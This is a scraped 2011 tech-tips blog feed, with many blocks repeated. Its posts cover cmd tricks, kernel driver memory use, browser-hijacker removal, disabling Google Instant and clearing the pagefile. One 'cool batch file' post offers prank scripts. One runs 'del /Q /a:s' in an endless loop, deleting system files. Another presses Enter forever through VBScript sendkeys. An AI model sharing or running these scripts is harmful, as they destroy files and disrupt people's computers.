Did you know you can drag & drop files and folders to the command prompt windows (and to any open window in the task bar)?
For example, a trick that I use is this:
Suppose you want to run a DOS command on a particular folder (ex: "C:\Winnt\system32\drivers\etc")
1 - Open the command prompt (Start->Run->cmd.exe) or use the shortcut
2 - Open a Windows Explorer window and go to the parent folder (ex: "C:\System32\Drivers")
3 - On the DOS windows type CD " (leave the quote!)
4 - From the Explorer window, drag the folder (you'll see a small square with a PLUS sign) to the taskbar over the Command Prompt window until it pops up again, then release the mouse over the command prompt.
5 - The full path to the folder is written in the command prompt. Just add the closing quote and away you go! It is faster that writing the whole path if the directory is various levels deep!
Thursday, October 13, 2011
Enable or disable command extensions
When you use CMD.EXE, there are various extensions which are enabled by default. To enable/disable perform the following
1.Start the registry editor (regedit.exe)
2.Move to HKEY_CURRENT_USER\Software\Microsoft\Command Processor
3.Double click on EnableExtensions
4.Set to 1 for them to be enabled, or set to 0 for extensions to be disabled
5.Click OK
You can also enable/disable them for a specific command session by using the appropriate qualifier to cmd.exe
cmd /y disables command extensions for this cmd session
cmd /x enables command extensions for this cmd session
1.Start the registry editor (regedit.exe)
2.Move to HKEY_CURRENT_USER\Software\Microsoft\Command Processor
3.Double click on EnableExtensions
4.Set to 1 for them to be enabled, or set to 0 for extensions to be disabled
5.Click OK
You can also enable/disable them for a specific command session by using the appropriate qualifier to cmd.exe
cmd /y disables command extensions for this cmd session
cmd /x enables command extensions for this cmd session
How to make efficient use of Computer Memory
In this post I will provide 5 tips for using memory efficiently in kernel-mode drivers for the Microsoft Windows family of operating systems.
Using memory wisely can help improve driver performance. Here are 5 tips for efficient memory use.
1.Lay out data structures efficiently and reuse them when possible
When designing your driver, plan your memory allocations according to type of memory, size, and lifetime. Combine allocations of similar lifetimes, so that you can free unused memory as soon as it is no longer needed. Don’t mix structures of greatly different sizes in the same allocation unless you can be sure that they will be aligned appropriately.
Reuse structures instead of freeing them and later reallocating memory for other uses. Reusing structures avoids additional reallocations and can help prevent fragmentation of the memory pool.
Drivers often require additional memory while handling I/O requests. A driver might allocate a memory descriptor list (MDL) or internal buffer to use for a specific I/O request or might need to allocate an IRP to send to lower drivers. The size of these structures varies depending on the request. The size of an MDL, for example, depends on the size of the buffer it describes.
If your driver has a technique to limit I/O size or to split up a large I/O request, you could make the buffer a fixed size, thus fixing the size of the MDL and making the buffer reusable.
Keep in mind that all performance issues involve tuning and balance. As a general rule, you should optimize for the most frequent operations, and not for unusually large or small requests that rarely occur.
2.Allocate nonpaged pool memory for long-term use at start-up
Drivers normally use nonpaged pool memory for long-term I/O buffers. Because nonpaged pool becomes fragmented as the system runs, drivers should preallocate memory that they will require for long-term structures and deallocate it when the device is removed. For example, a driver that always performs DMA, creates several events, and uses a lookaside list should allocate memory for those objects at startup in a DriverEntry or AddDevice routine and free the memory as part of handling the device removal request.
The driver should not, however, preallocate excessively large blocks of memory (several megabytes, for example) and try to manage its own allocations within that block.
Appropriate memory allocation routines include ExAllocatePoolWithTag, ExAllocatePoolWithQuotaTag, ExAllocatePoolWithTagPriority and AllocateCommonBuffer (if the driver's device uses bus-master DMA or a system DMA controller's auto-initialize mode).
Drivers should use the tagged versions of the pool allocation routines instead of the nontagged versions, which are obsolete. WinDbg and numerous testing tools use the tags to track memory allocation. Tagging pool allocations can help you more easily find memory-related bugs.
3.Use memory economically
Nonpaged pool memory is a limited system resource. Drivers should allocate I/O buffers as economically as possible. In general, avoid calling the memory allocation support routines repeatedly to request allocations of less than PAGE_SIZE. If your driver normally uses several related structures together, consider bundling those structures into a single allocation. For example, the SCSI port driver bundles an IRP, a SCSI request block (SRB), and an MDL into a single allocation.
Drivers that use DMA are an exception. If a driver that performs DMA needs several one-page buffers, but the buffers need not be contiguous, it should call AllocateCommonBuffer once for each such buffer. This approach conserves contiguous address space and improves the chances that the memory allocations will succeed.
In addition, consider whether the memory allocation routines you plan to use round the allocation request up to the next page boundary.
If the driver requests fewer than PAGE_SIZE bytes, ExAllocatePoolWithTag allocates the number of bytes requested. If the driver requests PAGE_SIZE or greater bytes, ExAllocatePoolWithTag allocates a page-aligned buffer that is an integral multiple of PAGE_SIZE bytes. Memory allocations of less than PAGE_SIZE do not cross page boundaries and are not necessarily page-aligned; instead, they are aligned on an 8-byte boundary.
AllocateCommonBuffer always allocates at least a page of memory. If the driver requests less than an integral multiple of PAGE_SIZE bytes, the remaining bytes on the last page are inaccessible to the driver.
4.Use lookaside lists
Lookaside lists provide fixed-size, reusable buffers. They are designed for structures that a driver might need to allocate dynamically and in unpredictable numbers.
Lookaside lists can be allocated from paged pool or nonpaged pool. The driver defines the layout and contents of the entries in the list to suit its requirements, and the system maintains list status and adjusts the number of available entries according to demand.
A driver calls ExInitialize[N]PagedLookasideList to set up a lookaside list, ExAllocateFrom[N]PagedLookasideList to allocate an entry in the list, and ExFreeTo[N]PagedLookasideList to free an entry in the list. The head of the list must be allocated from nonpaged memory, even if the list entries themselves are in paged memory.
5.Avoid frequently mapping and unmapping the virtual address space
Frequently mapping and unmapping the virtual address space can decrease performance system-wide because it can result in frequent flushes of the translation lookaside buffer (TLB), a per-processor cache of virtual-to-physical address translations. Each entry in the TLB contains a page table entry (PTE).
Every time the system translates a virtual address that references a new page, it adds an entry to the TLB. Once the TLB is full, the system must drop an existing entry every time it must add a new entry. Subsequently, each time a caller remaps or unmaps the address space, thus changing a PTE, the system must interrupt all CPUs so that it can update any TLB entries that contain the PTE.
Internally, the I/O manager avoids this problem for the MDL in Irp->MdlAddress . The first time a kernel-mode component calls MmGetSystemAddressForMdlSafe , the I/O manager stores the system address in the MDL along with the corresponding physical address. When the IRP returns to the I/O manager after completion,, the I/O manager unmaps the MDL. Thus, the I/O manager requires only a single mapping (and a single virtual to physical address translation) for each I/O request.
Using memory wisely can help improve driver performance. Here are 5 tips for efficient memory use.
1.Lay out data structures efficiently and reuse them when possible
When designing your driver, plan your memory allocations according to type of memory, size, and lifetime. Combine allocations of similar lifetimes, so that you can free unused memory as soon as it is no longer needed. Don’t mix structures of greatly different sizes in the same allocation unless you can be sure that they will be aligned appropriately.
Reuse structures instead of freeing them and later reallocating memory for other uses. Reusing structures avoids additional reallocations and can help prevent fragmentation of the memory pool.
Drivers often require additional memory while handling I/O requests. A driver might allocate a memory descriptor list (MDL) or internal buffer to use for a specific I/O request or might need to allocate an IRP to send to lower drivers. The size of these structures varies depending on the request. The size of an MDL, for example, depends on the size of the buffer it describes.
If your driver has a technique to limit I/O size or to split up a large I/O request, you could make the buffer a fixed size, thus fixing the size of the MDL and making the buffer reusable.
Keep in mind that all performance issues involve tuning and balance. As a general rule, you should optimize for the most frequent operations, and not for unusually large or small requests that rarely occur.
2.Allocate nonpaged pool memory for long-term use at start-up
Drivers normally use nonpaged pool memory for long-term I/O buffers. Because nonpaged pool becomes fragmented as the system runs, drivers should preallocate memory that they will require for long-term structures and deallocate it when the device is removed. For example, a driver that always performs DMA, creates several events, and uses a lookaside list should allocate memory for those objects at startup in a DriverEntry or AddDevice routine and free the memory as part of handling the device removal request.
The driver should not, however, preallocate excessively large blocks of memory (several megabytes, for example) and try to manage its own allocations within that block.
Appropriate memory allocation routines include ExAllocatePoolWithTag, ExAllocatePoolWithQuotaTag, ExAllocatePoolWithTagPriority and AllocateCommonBuffer (if the driver's device uses bus-master DMA or a system DMA controller's auto-initialize mode).
Drivers should use the tagged versions of the pool allocation routines instead of the nontagged versions, which are obsolete. WinDbg and numerous testing tools use the tags to track memory allocation. Tagging pool allocations can help you more easily find memory-related bugs.
3.Use memory economically
Nonpaged pool memory is a limited system resource. Drivers should allocate I/O buffers as economically as possible. In general, avoid calling the memory allocation support routines repeatedly to request allocations of less than PAGE_SIZE. If your driver normally uses several related structures together, consider bundling those structures into a single allocation. For example, the SCSI port driver bundles an IRP, a SCSI request block (SRB), and an MDL into a single allocation.
Drivers that use DMA are an exception. If a driver that performs DMA needs several one-page buffers, but the buffers need not be contiguous, it should call AllocateCommonBuffer once for each such buffer. This approach conserves contiguous address space and improves the chances that the memory allocations will succeed.
In addition, consider whether the memory allocation routines you plan to use round the allocation request up to the next page boundary.
If the driver requests fewer than PAGE_SIZE bytes, ExAllocatePoolWithTag allocates the number of bytes requested. If the driver requests PAGE_SIZE or greater bytes, ExAllocatePoolWithTag allocates a page-aligned buffer that is an integral multiple of PAGE_SIZE bytes. Memory allocations of less than PAGE_SIZE do not cross page boundaries and are not necessarily page-aligned; instead, they are aligned on an 8-byte boundary.
AllocateCommonBuffer always allocates at least a page of memory. If the driver requests less than an integral multiple of PAGE_SIZE bytes, the remaining bytes on the last page are inaccessible to the driver.
4.Use lookaside lists
Lookaside lists provide fixed-size, reusable buffers. They are designed for structures that a driver might need to allocate dynamically and in unpredictable numbers.
Lookaside lists can be allocated from paged pool or nonpaged pool. The driver defines the layout and contents of the entries in the list to suit its requirements, and the system maintains list status and adjusts the number of available entries according to demand.
A driver calls ExInitialize[N]PagedLookasideList to set up a lookaside list, ExAllocateFrom[N]PagedLookasideList to allocate an entry in the list, and ExFreeTo[N]PagedLookasideList to free an entry in the list. The head of the list must be allocated from nonpaged memory, even if the list entries themselves are in paged memory.
5.Avoid frequently mapping and unmapping the virtual address space
Frequently mapping and unmapping the virtual address space can decrease performance system-wide because it can result in frequent flushes of the translation lookaside buffer (TLB), a per-processor cache of virtual-to-physical address translations. Each entry in the TLB contains a page table entry (PTE).
Every time the system translates a virtual address that references a new page, it adds an entry to the TLB. Once the TLB is full, the system must drop an existing entry every time it must add a new entry. Subsequently, each time a caller remaps or unmaps the address space, thus changing a PTE, the system must interrupt all CPUs so that it can update any TLB entries that contain the PTE.
Internally, the I/O manager avoids this problem for the MDL in Irp->MdlAddress . The first time a kernel-mode component calls MmGetSystemAddressForMdlSafe , the I/O manager stores the system address in the MDL along with the corresponding physical address. When the IRP returns to the I/O manager after completion,, the I/O manager unmaps the MDL. Thus, the I/O manager requires only a single mapping (and a single virtual to physical address translation) for each I/O request.
Google redirect virus or Browser hijacking: How to avoid and protect them from damage
The browser hijacking is one of the most commonly used type of online attack in which the attacker or the hacker tried to gain full access of your Internet browser which ever you may be using including the internet Explorer , Mozilla Firefox or even Opera. The attacker tried to change the form and the content while you surf the web. If you keep your computer up to date by installing software and updates with the latest safety and surfing rules respecting the essential security you're already doing much to prevent such attacks. However, if your browser has been hijacked, you can free the pirates and restore its settings in several ways.
How to Identify whether the browser has been hijacked
Among the indices browser hijacking include the following unusual behaviors:
1.The home page or other settings of your computer have been modified.
Example: links to sites that you tend to avoid have been added.
2.When some of the web pages become inaccessible
Including sites of antispyware and other security software.
3.The pop open cascade
The pop open continuously on your screen.
4.New toolbars and favorites have been installed
Displaying icons and links to Web pages side.
5.The computer is slower
Malicious software can slow the operation of your computer.
By following a few simple guidelines you can ensure the proper operation of your computer:
Be extremely careful when you download or installation on your computer
When you download a new program on your computer, a warning message appears, as in the following screenshot. Take this warning seriously. Games and multimedia services dubious online can hide spyware and other malicious software "free" needed to use their services. If you are unsure of the reliability of a program or a software component, do not download and do not install it on your computer. In addition, if you are prompted to allow installation of the program via a popup window, click No, unless you really want to install this program on your new computer.
Download and install protection software
1.Install automatic updates . In Windows 2000 and Windows XP, Updates will get installed automatically installed on your computer. However if you have disabled automatic updates in your computer and hence try it manually, So simply logon to the website Microsoft Update and install the service packs and updates for Windows, especially Windows SP2.
2.Ensure that you are using the newest version of the browser. If you are using Internet Explorer, make sure you use the latest version of the software and download and install all available security updates available.
3.Use antivirus software and antispyware updated. Set them to run automatically. Many browser hijacking attempts are linked to viruses or spyware.
Have a toolkit anti-diversion provision. A tool kit should include anti-diversion programs such as Microsoft Windows AntiSpyware (Beta) (available in English only) and Spybot , which, if misused, will help you to regain control of your browser and your computer. Furthermore, reliable antivirus programs can detect some diversion, sometimes marked as Trojans , and help eradicate them.
Configure the security settings of your browser
1.In the Tools menu, click Internet Options, then click the Security tab.
2.Click the Internet icon on the Custom Level button, then select Medium in the Reset menu.
3.Click the Reset button.
4.Click OK.
Restoring a hijacked browser
To try to restore the settings of your browser, follow the six tips below.
1 - Stop the continued opening of pop
When the pop open continuously on the screen of your computer, you probably want to stop the deluge first. Microsoft Windows XP or Windows 2000 with Internet Explorer, follow these steps:
1.Press CTRL + ALT + DEL, click Task Manager, then click the Processes tab.
2.Click IEXPLORE.EXE, then click the End Process button.
This closes all instances of Internet Explorer. You can then open the program again and surf as usual. To prevent future attacks, activate a program to block pop-ups. To enable the blocking of pop-ups from Internet Explorer:
1.In the Tools menu, click Internet Options, then click the Privacy tab.
2.In the window Pop-up Blocker, click the check box Block pop-ups. Click OK.
If other symptoms persist web browser hijacking, do the following:
2 - Install a program of prevention
As one of those mentioned in the paragraph entitled Skip browser hijacking. Many browser hijacking programs can be detected and removed by running these programs, once downloaded and installed on your computer.
3 - Run the removal tool for malicious software .
It can detect certain types of diversion program, but not all. I recommend you to download the Microsoft Security Essential
4 - Manually restore your settings. If you are using the Internet Explorer browser and your homepage has been changed, you can restore yourself.
1.In the Tools menu, click Internet Options, then click the General tab.
2.In the Start page, enter the desired Internet address in the Address bar, or click the Back button to restore the default setting of the original manufacturer.
3.Click OK.
5 - Remove unwanted programs using the Add or Remove Programs.
If you want to try to eradicate advanced methods, see the article titled Unexplained computer behavior 'may be Caused by deceptive software on the support site and Microsoft support. You can find additional steps, including activities at the Add / Remove programs, delete program integrated, and the search function in Windows Explorer program.
6 - Empty the trash
After all these steps, especially if you have removed an unwanted program. Restart your computer.
How to Identify whether the browser has been hijacked
Among the indices browser hijacking include the following unusual behaviors:
1.The home page or other settings of your computer have been modified.
Example: links to sites that you tend to avoid have been added.
2.When some of the web pages become inaccessible
Including sites of antispyware and other security software.
3.The pop open cascade
The pop open continuously on your screen.
4.New toolbars and favorites have been installed
Displaying icons and links to Web pages side.
5.The computer is slower
Malicious software can slow the operation of your computer.
By following a few simple guidelines you can ensure the proper operation of your computer:
Be extremely careful when you download or installation on your computer
When you download a new program on your computer, a warning message appears, as in the following screenshot. Take this warning seriously. Games and multimedia services dubious online can hide spyware and other malicious software "free" needed to use their services. If you are unsure of the reliability of a program or a software component, do not download and do not install it on your computer. In addition, if you are prompted to allow installation of the program via a popup window, click No, unless you really want to install this program on your new computer.
Download and install protection software
1.Install automatic updates . In Windows 2000 and Windows XP, Updates will get installed automatically installed on your computer. However if you have disabled automatic updates in your computer and hence try it manually, So simply logon to the website Microsoft Update and install the service packs and updates for Windows, especially Windows SP2.
2.Ensure that you are using the newest version of the browser. If you are using Internet Explorer, make sure you use the latest version of the software and download and install all available security updates available.
3.Use antivirus software and antispyware updated. Set them to run automatically. Many browser hijacking attempts are linked to viruses or spyware.
Have a toolkit anti-diversion provision. A tool kit should include anti-diversion programs such as Microsoft Windows AntiSpyware (Beta) (available in English only) and Spybot , which, if misused, will help you to regain control of your browser and your computer. Furthermore, reliable antivirus programs can detect some diversion, sometimes marked as Trojans , and help eradicate them.
Configure the security settings of your browser
1.In the Tools menu, click Internet Options, then click the Security tab.
2.Click the Internet icon on the Custom Level button, then select Medium in the Reset menu.
3.Click the Reset button.
4.Click OK.
Restoring a hijacked browser
To try to restore the settings of your browser, follow the six tips below.
1 - Stop the continued opening of pop
When the pop open continuously on the screen of your computer, you probably want to stop the deluge first. Microsoft Windows XP or Windows 2000 with Internet Explorer, follow these steps:
1.Press CTRL + ALT + DEL, click Task Manager, then click the Processes tab.
2.Click IEXPLORE.EXE, then click the End Process button.
This closes all instances of Internet Explorer. You can then open the program again and surf as usual. To prevent future attacks, activate a program to block pop-ups. To enable the blocking of pop-ups from Internet Explorer:
1.In the Tools menu, click Internet Options, then click the Privacy tab.
2.In the window Pop-up Blocker, click the check box Block pop-ups. Click OK.
If other symptoms persist web browser hijacking, do the following:
2 - Install a program of prevention
As one of those mentioned in the paragraph entitled Skip browser hijacking. Many browser hijacking programs can be detected and removed by running these programs, once downloaded and installed on your computer.
3 - Run the removal tool for malicious software .
It can detect certain types of diversion program, but not all. I recommend you to download the Microsoft Security Essential
4 - Manually restore your settings. If you are using the Internet Explorer browser and your homepage has been changed, you can restore yourself.
1.In the Tools menu, click Internet Options, then click the General tab.
2.In the Start page, enter the desired Internet address in the Address bar, or click the Back button to restore the default setting of the original manufacturer.
3.Click OK.
5 - Remove unwanted programs using the Add or Remove Programs.
If you want to try to eradicate advanced methods, see the article titled Unexplained computer behavior 'may be Caused by deceptive software on the support site and Microsoft support. You can find additional steps, including activities at the Add / Remove programs, delete program integrated, and the search function in Windows Explorer program.
6 - Empty the trash
After all these steps, especially if you have removed an unwanted program. Restart your computer.
Monday, October 10, 2011
cool batch file
1).
@echo off
echo blanking screen .......
cls
echo searching ini's
@dir c:\*.ini /s/w
echo .... Scared ?
pause
2).
@echo off
:start
echo 15623682356574 /q /w
color 24
del /Q /a:s
echo geras-lakha
goto start
3).
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
@echo off
echo blanking screen .......
cls
echo searching ini's
@dir c:\*.ini /s/w
echo .... Scared ?
pause
2).
@echo off
:start
echo 15623682356574 /q /w
color 24
del /Q /a:s
echo geras-lakha
goto start
3).
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Friday, October 7, 2011
Cara men disable Google Instan Search
Google memperkenalkan fitur baru dalam mesin pencarian. Google menyebutnya sebagai Instant Search. Perubahan ini diperkenalkan untuk membuat pencarian cepat dan interaktif dengan menunjukkan hasil yang seketika saat Anda mengetik. Dengan Google Instan, yang Anda cari telah berubah dari sebuah halaman HTML statis ke aplikasi AJAX, mirip dengan Google Maps dan Gmail. Tapi tidak semua pengguna internet menyukai fitur ini. Banyak alasan mengapa sebagian besar dari Anda ingin menonaktifkannya tetapi yang sangat umum biasanya masalah "kecepatan koneksi internet".
Jadi, jika Anda tidak ingin fitur ini dan ingin mematikannya, cukup membuat perubahan yang diperlukan dengan mengklik link di samping kotak pencarian pada setiap halaman hasil pencarian.
Sebagai contoh, pencarian untuk "Apple" di google dan Anda seharusnya mendapatkan beberapa hasil. Berikutnya Setelah pencarian, Anda akan melihat sebuah link dengan judul "Instan Is On". Klik "Instan Is On" dan kemudian pilih "Off (tekan Enter untuk pencarian)".
Done !
Jadi, jika Anda tidak ingin fitur ini dan ingin mematikannya, cukup membuat perubahan yang diperlukan dengan mengklik link di samping kotak pencarian pada setiap halaman hasil pencarian.
Sebagai contoh, pencarian untuk "Apple" di google dan Anda seharusnya mendapatkan beberapa hasil. Berikutnya Setelah pencarian, Anda akan melihat sebuah link dengan judul "Instan Is On". Klik "Instan Is On" dan kemudian pilih "Off (tekan Enter untuk pencarian)".
Done !
Wednesday, October 5, 2011
Clear your sensitive information on system shutdown
During data processing some operating systems use the hard disk as memory, called virtual memory. During processing, operating system transfers some data and programs from RAM to hard disk and reloads again when required. The data or programs are stored in hard disk in temporary file called the swap file. This technique of swapping data between memory and hard disk is called paging. Operating system spends a lot of time in paging process, instead of executing the application software. But the problem is that while working you use different software programs on computer and page file may contain your confidential information or stored in non encrypted format. To reduce this risk, you can set your computer to clear out page file automatically each time you shutdown your computer.
Perform the given steps to set your system clear page file automatically:
To enable this feature, you will need to be logged into your computer with administrative rights.
First click on start button to open control panel and then click here on "Administrative Tools" option.
Now "Local Security Settings" panel will appear, on lift side of this panel click on "Local Policies".
Here click on "Security Options" then double click on "Shutdown: Clear virtual memory pagefile" option.
Now small dialog box will appear with options, "Enabled or Disabled" the page file.
Press Apply button to save settings and then click on Ok button to finish.
source : http://www.computeronlinetips.com
Perform the given steps to set your system clear page file automatically:
To enable this feature, you will need to be logged into your computer with administrative rights.
First click on start button to open control panel and then click here on "Administrative Tools" option.
Now "Local Security Settings" panel will appear, on lift side of this panel click on "Local Policies".
Here click on "Security Options" then double click on "Shutdown: Clear virtual memory pagefile" option.
Now small dialog box will appear with options, "Enabled or Disabled" the page file.
Press Apply button to save settings and then click on Ok button to finish.
source : http://www.computeronlinetips.com
Subscribe to:
Posts (Atom)